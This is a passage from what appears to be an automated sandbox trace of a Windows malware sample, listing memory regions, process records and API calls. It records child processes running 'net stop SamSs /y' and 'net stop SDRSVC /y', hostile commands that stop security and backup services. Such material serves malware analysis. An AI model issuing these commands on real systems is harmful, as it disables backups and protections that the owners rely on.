"c:\\windows\\system32\\kernel32.dll") Region: id = 9456 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 9714 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 9715 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 9716 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 9717 start_va = 0x3d0000 end_va = 0x4cffff entry_point = 0x0 region_type = private name = "private_0x00000000003d0000" filename = "" Region: id = 9718 start_va = 0x4d0000 end_va = 0x4dffff entry_point = 0x0 region_type = private name = "private_0x00000000004d0000" filename = "" Region: id = 9719 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 9720 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 9721 start_va = 0x7fef46a0000 end_va = 0x7fef46b1fff entry_point = 0x7fef46a0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 9722 start_va = 0x7fefaaa0000 end_va = 0x7fefaab7fff entry_point = 0x7fefaaa0000 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll") Region: id = 9723 start_va = 0x7fefaf50000 end_va = 0x7fefaf5afff entry_point = 0x7fefaf50000 region_type = mapped_file name = "winnsi.dll" filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll") Region: id = 9724 start_va = 0x7fefaf60000 end_va = 0x7fefaf86fff entry_point = 0x7fefaf60000 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll") Region: id = 9725 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 9726 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 9727 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 9728 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 9729 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 9730 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 9731 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 9732 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 9733 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Thread: id = 724 os_tid = 0xf28 Process: id = "250" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x53a16000" os_pid = "0xf30" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "247" os_parent_pid = "0xc40" cmd_line = "C:\\Windows\\system32\\net1 stop SamSs /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 9457 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 9458 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 9459 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 9460 start_va = 0x150000 end_va = 0x1cffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 9461 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 9462 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 9463 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 9464 start_va = 0xff480000 end_va = 0xff4b2fff entry_point = 0xff480000 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\System32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe") Region: id = 9465 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 9466 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 9467 start_va = 0x7fffffdd000 end_va = 0x7fffffddfff entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 9468 start_va = 0x7fffffde000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffde000" filename = "" Region: id = 9469 start_va = 0x1e0000 end_va = 0x2dffff entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 9470 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 9471 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 9532 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 9533 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 9534 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 9535 start_va = 0x140000 end_va = 0x14ffff entry_point = 0x0 region_type = private name = "private_0x0000000000140000" filename = "" Region: id = 9536 start_va = 0x2e0000 end_va = 0x3dffff entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 9537 start_va = 0x7efe0000 end_va = 0x7f0dffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007efe0000" filename = "" Region: id = 9538 start_va = 0x7f0e0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007f0e0000" filename = "" Region: id = 9539 start_va = 0x7fef7330000 end_va = 0x7fef7356fff entry_point = 0x7fef7330000 region_type = mapped_file name = "ntdsapi.dll" filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll") Region: id = 9540 start_va = 0x7fefb050000 end_va = 0x7fefb05bfff entry_point = 0x7fefb050000 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll") Region: id = 9541 start_va = 0x7fefb6e0000 end_va = 0x7fefb6f1fff entry_point = 0x7fefb6e0000 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\System32\\browcli.dll" (normalized: "c:\\windows\\system32\\browcli.dll") Region: id = 9542 start_va = 0x7fefb7c0000 end_va = 0x7fefb7d3fff entry_point = 0x7fefb7c0000 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll") Region: id = 9543 start_va = 0x7fefb7e0000 end_va = 0x7fefb7f4fff entry_point = 0x7fefb7e0000 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll") Region: id = 9544 start_va = 0x7fefb800000 end_va = 0x7fefb80bfff entry_point = 0x7fefb800000 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll") Region: id = 9545 start_va = 0x7fefb810000 end_va = 0x7fefb825fff entry_point = 0x7fefb810000 region_type = mapped_file name = "netapi32.dll" filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll") Region: id = 9546 start_va = 0x7fefc0a0000 end_va = 0x7fefc0bcfff entry_point = 0x7fefc0a0000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 9547 start_va = 0x7fefcca0000 end_va = 0x7fefcccffff entry_point = 0x7fefcca0000 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll") Region: id = 9548 start_va = 0x7fefd3b0000 end_va = 0x7fefd3d2fff entry_point = 0x7fefd3b0000 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\System32\\srvcli.dll" (normalized: "c:\\windows\\system32\\srvcli.dll") Region: id = 9549 start_va = 0x7fefdb10000 end_va = 0x7fefdbaefff entry_point = 0x7fefdb10000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 9550 start_va = 0x7fefe330000 end_va = 0x7fefe34efff entry_point = 0x7fefe330000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 9551 start_va = 0x7feff2d0000 end_va = 0x7feff2d7fff entry_point = 0x7feff2d0000 region_type = mapped_file name = "nsi.dll" filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll") Region: id = 9552 start_va = 0x7feff490000 end_va = 0x7feff4dcfff entry_point = 0x7feff490000 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 9553 start_va = 0x7feff740000 end_va = 0x7feff81afff entry_point = 0x7feff740000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 9554 start_va = 0x7feff820000 end_va = 0x7feff94cfff entry_point = 0x7feff820000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 9555 start_va = 0x75290000 end_va = 0x75291fff entry_point = 0x75290000 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\System32\\netmsg.dll" (normalized: "c:\\windows\\system32\\netmsg.dll") Thread: id = 726 os_tid = 0xf34 [0109.091] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1cfaf0 | out: lpSystemTimeAsFileTime=0x1cfaf0*(dwLowDateTime=0xf62db090, dwHighDateTime=0x1d48689)) [0109.091] GetCurrentProcessId () returned 0xf30 [0109.091] GetCurrentThreadId () returned 0xf34 [0109.091] GetTickCount () returned 0x24ff3 [0109.091] QueryPerformanceCounter (in: lpPerformanceCount=0x1cfaf8 | out: lpPerformanceCount=0x1cfaf8*=1815600900000) returned 1 [0109.092] GetModuleHandleW (lpModuleName=0x0) returned 0xff480000 [0109.092] __set_app_type (_Type=0x1) [0109.092] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xff499c9c) returned 0x0 [0109.092] __getmainargs (in: _Argc=0xff4a4780, _Argv=0xff4a4790, _Env=0xff4a4788, _DoWildCard=0, _StartInfo=0xff4a479c | out: _Argc=0xff4a4780, _Argv=0xff4a4790, _Env=0xff4a4788) returned 0 [0109.093] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0109.093] GetConsoleOutputCP () returned 0x1b5 [0109.093] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0xff4acec0 | out: lpCPInfo=0xff4acec0) returned 1 [0109.093] SetThreadUILanguage (LangId=0x0) returned 0x7fffffd0409 [0109.095] sprintf_s (in: _DstBuf=0x1cfa98, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0109.095] setlocale (category=0, locale=".437") returned="English_United States.437" [0109.097] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0109.097] GetStdHandle (nStdHandle=0xfffffff4) returned 0xb [0109.097] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop SamSs /y" [0109.097] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1cf830, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\net1.exe" (normalized: "c:\\windows\\system32\\net1.exe")) returned 0x1c [0109.097] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0109.097] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x1cfa88 | out: Buffer=0x1cfa88*=0x1f4d40) returned 0x0 [0109.097] NetApiBufferAllocate (in: ByteCount=0x18, Buffer=0x1cfa88 | out: Buffer=0x1cfa88*=0x1fc0e0) returned 0x0 [0109.097] _fileno (_File=0x7fefdba2a80) returned 0 [0109.097] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0109.097] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0109.097] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0109.097] _wcsicmp (_String1="config", _String2="stop") returned -16 [0109.097] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0109.098] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0109.098] _wcsicmp (_String1="file", _String2="stop") returned -13 [0109.098] _wcsicmp (_String1="files", _String2="stop") returned -13 [0109.098] _wcsicmp (_String1="group", _String2="stop") returned -12 [0109.098] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0109.098] _wcsicmp (_String1="help", _String2="stop") returned -11 [0109.098] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0109.098] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0109.098] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0109.098] _wcsicmp (_String1="session", _String2="stop") returned -15 [0109.098] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0109.098] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0109.098] _wcsicmp (_String1="share", _String2="stop") returned -12 [0109.098] _wcsicmp (_String1="start", _String2="stop") returned -14 [0109.098] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0109.098] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0109.098] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0109.098] _wcsicmp (_String1="accounts", _String2="SamSs") returned -18 [0109.098] _wcsicmp (_String1="computer", _String2="SamSs") returned -16 [0109.098] _wcsicmp (_String1="config", _String2="SamSs") returned -16 [0109.098] _wcsicmp (_String1="continue", _String2="SamSs") returned -16 [0109.098] _wcsicmp (_String1="cont", _String2="SamSs") returned -16 [0109.098] _wcsicmp (_String1="file", _String2="SamSs") returned -13 [0109.098] _wcsicmp (_String1="files", _String2="SamSs") returned -13 [0109.098] _wcsicmp (_String1="group", _String2="SamSs") returned -12 [0109.098] _wcsicmp (_String1="groups", _String2="SamSs") returned -12 [0109.098] _wcsicmp (_String1="help", _String2="SamSs") returned -11 [0109.098] _wcsicmp (_String1="helpmsg", _String2="SamSs") returned -11 [0109.098] _wcsicmp (_String1="localgroup", _String2="SamSs") returned -7 [0109.098] _wcsicmp (_String1="pause", _String2="SamSs") returned -3 [0109.098] _wcsicmp (_String1="session", _String2="SamSs") returned 4 [0109.098] _wcsicmp (_String1="sessions", _String2="SamSs") returned 4 [0109.098] _wcsicmp (_String1="sess", _String2="SamSs") returned 4 [0109.099] _wcsicmp (_String1="share", _String2="SamSs") returned 7 [0109.099] _wcsicmp (_String1="start", _String2="SamSs") returned 19 [0109.099] _wcsicmp (_String1="stats", _String2="SamSs") returned 19 [0109.099] _wcsicmp (_String1="statistics", _String2="SamSs") returned 19 [0109.099] _wcsicmp (_String1="stop", _String2="SamSs") returned 19 [0109.099] _wcsicmp (_String1="time", _String2="SamSs") returned 1 [0109.099] _wcsicmp (_String1="user", _String2="SamSs") returned 2 [0109.099] _wcsicmp (_String1="users", _String2="SamSs") returned 2 [0109.099] _wcsicmp (_String1="msg", _String2="SamSs") returned -6 [0109.099] _wcsicmp (_String1="messenger", _String2="SamSs") returned -6 [0109.099] _wcsicmp (_String1="receiver", _String2="SamSs") returned -1 [0109.099] _wcsicmp (_String1="rcv", _String2="SamSs") returned -1 [0109.099] _wcsicmp (_String1="netpopup", _String2="SamSs") returned -5 [0109.099] _wcsicmp (_String1="redirector", _String2="SamSs") returned -1 [0109.099] _wcsicmp (_String1="redir", _String2="SamSs") returned -1 [0109.099] _wcsicmp (_String1="rdr", _String2="SamSs") returned -1 [0109.099] _wcsicmp (_String1="workstation", _String2="SamSs") returned 4 [0109.099] _wcsicmp (_String1="work", _String2="SamSs") returned 4 [0109.099] _wcsicmp (_String1="wksta", _String2="SamSs") returned 4 [0109.099] _wcsicmp (_String1="prdr", _String2="SamSs") returned -3 [0109.099] _wcsicmp (_String1="devrdr", _String2="SamSs") returned -15 [0109.099] _wcsicmp (_String1="lanmanworkstation", _String2="SamSs") returned -7 [0109.099] _wcsicmp (_String1="server", _String2="SamSs") returned 4 [0109.099] _wcsicmp (_String1="svr", _String2="SamSs") returned 21 [0109.099] _wcsicmp (_String1="srv", _String2="SamSs") returned 17 [0109.099] _wcsicmp (_String1="lanmanserver", _String2="SamSs") returned -7 [0109.099] _wcsicmp (_String1="alerter", _String2="SamSs") returned -18 [0109.099] _wcsicmp (_String1="netlogon", _String2="SamSs") returned -5 [0109.099] _wcsupr (in: _String="SamSs" | out: _String="SAMSS") returned="SAMSS" [0109.100] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x1fc900 [0109.103] GetServiceKeyNameW (in: hSCManager=0x1fc900, lpDisplayName="SAMSS", lpServiceName=0xff4a5750, lpcchBuffer=0x1cf9a8 | out: lpServiceName="", lpcchBuffer=0x1cf9a8) returned 0 [0109.105] _wcsicmp (_String1="msg", _String2="SAMSS") returned -6 [0109.105] _wcsicmp (_String1="messenger", _String2="SAMSS") returned -6 [0109.105] _wcsicmp (_String1="receiver", _String2="SAMSS") returned -1 [0109.105] _wcsicmp (_String1="rcv", _String2="SAMSS") returned -1 [0109.105] _wcsicmp (_String1="redirector", _String2="SAMSS") returned -1 [0109.105] _wcsicmp (_String1="redir", _String2="SAMSS") returned -1 [0109.105] _wcsicmp (_String1="rdr", _String2="SAMSS") returned -1 [0109.105] _wcsicmp (_String1="workstation", _String2="SAMSS") returned 4 [0109.105] _wcsicmp (_String1="work", _String2="SAMSS") returned 4 [0109.105] _wcsicmp (_String1="wksta", _String2="SAMSS") returned 4 [0109.105] _wcsicmp (_String1="prdr", _String2="SAMSS") returned -3 [0109.105] _wcsicmp (_String1="devrdr", _String2="SAMSS") returned -15 [0109.105] _wcsicmp (_String1="lanmanworkstation", _String2="SAMSS") returned -7 [0109.105] _wcsicmp (_String1="server", _String2="SAMSS") returned 4 [0109.105] _wcsicmp (_String1="svr", _String2="SAMSS") returned 21 [0109.105] _wcsicmp (_String1="srv", _String2="SAMSS") returned 17 [0109.105] _wcsicmp (_String1="lanmanserver", _String2="SAMSS") returned -7 [0109.105] _wcsicmp (_String1="alerter", _String2="SAMSS") returned -18 [0109.105] _wcsicmp (_String1="netlogon", _String2="SAMSS") returned -5 [0109.105] NetServiceControl (in: servername=0x0, service="SAMSS", opcode=0x0, arg=0x0, bufptr=0x1cf9b0 | out: bufptr=0x1cf9b0) returned 0x0 [0109.107] NetApiBufferAllocate (in: ByteCount=0xfa0, Buffer=0x1cf968 | out: Buffer=0x1cf968*=0x200c70) returned 0x0 [0109.107] OpenServiceW (hSCManager=0x1fc900, lpServiceName="SAMSS", dwDesiredAccess=0xc) returned 0x1fc960 [0109.107] QueryServiceStatus (in: hService=0x1fc960, lpServiceStatus=0x1cf910 | out: lpServiceStatus=0x1cf910*(dwServiceType=0x20, dwCurrentState=0x4, dwControlsAccepted=0x0, dwWin32ExitCode=0x0, dwServiceSpecificExitCode=0x0, dwCheckPoint=0x0, dwWaitHint=0x0)) returned 1 [0109.107] NetApiBufferFree (Buffer=0x200c70) returned 0x0 [0109.108] CloseServiceHandle (hSCObject=0x1fc960) returned 1 [0109.108] wcscpy_s (in: _Destination=0xff4a80d0, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0109.108] LoadLibraryW (lpLibFileName="NETMSG") returned 0x75290000 [0109.109] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x75290000, dwMessageId=0x88f, dwLanguageId=0x0, lpBuffer=0xff4a5b50, nSize=0x800, Arguments=0xff4a7f90 | out: lpBuffer="The requested pause, continue, or stop is not valid for this service.\r\n") returned 0x47 [0109.110] GetFileType (hFile=0xb) returned 0x2 [0109.110] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1cf808 | out: lpMode=0x1cf808) returned 1 [0109.111] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff4a5b50*, nNumberOfCharsToWrite=0x47, lpNumberOfCharsWritten=0x1cf800, lpReserved=0x0 | out: lpBuffer=0xff4a5b50*, lpNumberOfCharsWritten=0x1cf800*=0x47) returned 1 [0109.111] GetFileType (hFile=0xb) returned 0x2 [0109.111] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1cf808 | out: lpMode=0x1cf808) returned 1 [0109.111] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff481efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x1cf800, lpReserved=0x0 | out: lpBuffer=0xff481efc*, lpNumberOfCharsWritten=0x1cf800*=0x2) returned 1 [0109.112] _ultow (in: _Dest=0x88f, _Radix=1898608 | out: _Dest=0x88f) returned="2191" [0109.112] FormatMessageW (in: dwFlags=0x2800, lpSource=0x75290000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xff4a5b50, nSize=0x800, Arguments=0xff4a7f90 | out: lpBuffer="More help is available by typing NET HELPMSG 2191.\r\n") returned 0x34 [0109.112] GetFileType (hFile=0xb) returned 0x2 [0109.112] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1cf808 | out: lpMode=0x1cf808) returned 1 [0109.112] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff4a5b50*, nNumberOfCharsToWrite=0x34, lpNumberOfCharsWritten=0x1cf800, lpReserved=0x0 | out: lpBuffer=0xff4a5b50*, lpNumberOfCharsWritten=0x1cf800*=0x34) returned 1 [0109.113] GetFileType (hFile=0xb) returned 0x2 [0109.113] GetConsoleMode (in: hConsoleHandle=0xb, lpMode=0x1cf808 | out: lpMode=0x1cf808) returned 1 [0109.113] WriteConsoleW (in: hConsoleOutput=0xb, lpBuffer=0xff481efc*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x1cf800, lpReserved=0x0 | out: lpBuffer=0xff481efc*, lpNumberOfCharsWritten=0x1cf800*=0x2) returned 1 [0109.113] NetApiBufferFree (Buffer=0x1f4d40) returned 0x0 [0109.114] NetApiBufferFree (Buffer=0x1fc0e0) returned 0x0 [0109.114] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop SamSs /y" [0109.114] exit (_Code=2) Process: id = "251" image_name = "net.exe" filename = "c:\\windows\\system32\\net.exe" page_root = "0x5d081000" os_pid = "0xfbc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x954" cmd_line = "\"C:\\Windows\\System32\\net.exe\" stop SDRSVC /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea88" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 9472 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 9473 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 9474 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 9475 start_va = 0x1b0000 end_va = 0x22ffff entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 9476 start_va = 0x77670000 end_va = 0x77818fff entry_point = 0x77670000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 9477 start_va = 0x7efe0000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007efe0000" filename = "" Region: id = 9478 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 9479 start_va = 0xff5a0000 end_va = 0xff5bbfff entry_point = 0xff5a0000 region_type = mapped_file name = "net.exe" filename = "\\Windows\\System32\\net.exe" (normalized: "c:\\windows\\system32\\net.exe") Region: id = 9480 start_va = 0x7feff990000 end_va = 0x7feff990fff entry_point = 0x7feff990000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 9481 start_va = 0x7fffffb0000 end_va = 0x7fffffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000007fffffb0000" filename = "" Region: id = 9482 start_va = 0x7fffffdd000 end_va = 0x7fffffdefff entry_point = 0x0 region_type = private name = "private_0x000007fffffdd000" filename = "" Region: id = 9483 start_va = 0x7fffffdf000 end_va = 0x7fffffdffff entry_point = 0x0 region_type = private name = "private_0x000007fffffdf000" filename = "" Region: id = 9484 start_va = 0x60000 end_va = 0x15ffff entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 9485 start_va = 0x77550000 end_va = 0x7766efff entry_point = 0x77550000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 9486 start_va = 0x7fefd920000 end_va = 0x7fefd98afff entry_point = 0x7fefd920000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Thread: id = 727 os_tid = 0x1014 Process: id = "252" image_name = "net1.exe" filename = "c:\\windows\\system32\\net1.exe" page_root = "0x556b5000" os_pid = "0xf8c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason 